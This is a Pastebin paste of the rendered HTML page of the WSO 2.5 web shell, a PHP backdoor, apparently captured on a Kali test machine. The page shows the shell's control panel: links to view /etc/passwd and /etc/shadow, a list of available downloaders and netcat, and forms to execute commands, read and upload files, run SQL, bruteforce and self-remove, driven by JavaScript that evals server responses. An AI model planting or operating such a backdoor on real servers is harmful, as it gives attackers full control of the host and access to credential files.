Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- As can be seen from the title and screenshots, this appears to be a fully featured web backdoor known as WSO 2.5 which allows full control over the target host.
- <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title>
- <style>
- body{background-color:#444;color:#e1e1e1;}
- body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
- table.info{ color:#fff;background-color:#222; }
- span,h1,a{ color: !important; }
- span{ font-weight: bolder; }
- h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
- div.content{ padding: 5px;margin-left:5px;background-color:#333; }
- a{ text-decoration:none; }
- a:hover{ text-decoration:underline; }
- .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
- .bigarea{ width:100%;height:300px; }
- input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; }
- form{ margin:0px; }
- #toolsTbl{ text-align:center; }
- .toolsInp{ width: 300px }
- .main th{text-align:left;background-color:#5e5e5e;}
- .main tr:hover{background-color:#5e5e5e}
- .l1{background-color:#444}
- .l2{background-color:#333}
- pre{font-family:Courier,Monospace;}
- </style>
- <script>
- var c_ = '/media/root/pentest/web/';
- var a_ = 'SecInfo'
- var charset_ = '';
- var p1_ = '';
- var p2_ = '';
- var p3_ = '';
- var d = document;
- function set(a,c,p1,p2,p3,charset) {
- if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
- if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
- if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
- if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
- if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
- if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
- }
- function g(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- d.mf.submit();
- }
- function a(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- var params = 'ajax=true';
- for(i=0;i<d.mf.elements.length;i++)
- params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
- sr('', params);
- }
- function sr(url, params) {
- if (window.XMLHttpRequest)
- req = new XMLHttpRequest();
- else if (window.ActiveXObject)
- req = new ActiveXObject('Microsoft.XMLHTTP');
- if (req) {
- req.onreadystatechange = processReqChange;
- req.open('POST', url, true);
- req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
- req.send(params);
- }
- }
- function processReqChange() {
- if( (req.readyState == 4) )
- if(req.status == 200) {
- var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
- var arr=reg.exec(req.responseText);
- eval(arr[2].substr(0, arr[1]));
- } else alert('Request error!');
- }
- </script>
- <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
- <form method=post name=mf style='display:none;'>
- <input type=hidden name=a>
- <input type=hidden name=c>
- <input type=hidden name=p1>
- <input type=hidden name=p2>
- <input type=hidden name=p3>
- <input type=hidden name=charset>
- </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux pentestvm 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.0.0-" target=_blank>[exploit-db.com]</a></nobr><br>0 ( root ) <span>Group:</span> 0 ( root )<br>5.6.9-0+deb8u1 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2015-08-15 21:42:53<br>1863.01 GB <span>Free:</span> 721.42 GB (38%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/media/")'>media/</a><a href='#' onclick='g("FilesMan","/media/root/")'>root/</a><a href='#' onclick='g("FilesMan","/media/root/pentest/")'>pentest/</a><a href='#' onclick='g("FilesMan","/media/root/pentest/web/")'>web/</a> <font color=#25ff00>drwxrwxrwx</font> <a href=# onclick="g('FilesMan','/media/root/pentest/web','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>none<br><span>cURL support: </span>enabled<br><span>Supported databases: </span>MySql (5.5.44)<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a><br><span>OS version: </span>Linux version 4.0.0-kali1-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10) ) #1 SMP Debian 4.0.4-1+kali2 (2015-06-03)<br><span>Distr name: </span>Kali GNU/Linux 2.0<br><br><span>Userful: </span>gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate<br><span>Danger: </span>chkrootkit, iptables<br><span>Downloaders: </span>wget, curl, lwp-mirror<br><br/><span>HDD space: </span><pre class=ml1>Filesystem Size Used Avail Use% Mounted on
- udev 10M 0 10M 0% /dev
- tmpfs 790M 13M 778M 2% /run
- /dev/sda1 288G 12G 262G 5% /
- tmpfs 2.0G 480K 2.0G 1% /dev/shm
- tmpfs 5.0M 0 5.0M 0% /run/lock
- tmpfs 2.0G 0 2.0G 0% /sys/fs/cgroup
- tmpfs 395M 28K 395M 1% /run/user/0
- /dev/sdb1 1.9T 1.2T 722G 62% /media/root</pre><span>Hosts: </span><pre class=ml1>127.0.0.1 localhost
- 127.0.1.1 pentestvm.crowdshield.com pentestvm
- # The following lines are desirable for IPv6 capable hosts
- ::1 localhost ip6-localhost ip6-loopback
- ff02::1 ip6-allnodes
- ff02::2 ip6-allrouters</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div>
- </div>
- <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
- <tr>
- <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/media/root/pentest/web/'><input type=submit value='>>'></form></td>
- <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
- </tr><tr>
- <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
- <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
- </tr><tr>
- <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
- <td><form method='post' ENCTYPE='multipart/form-data'>
- <input type=hidden name=a value='FilesMAn'>
- <input type=hidden name=c value='/media/root/pentest/web/'>
- <input type=hidden name=p1 value='uploadFile'>
- <input type=hidden name=charset value=''>
- <span>Upload file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
- </tr></table></div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement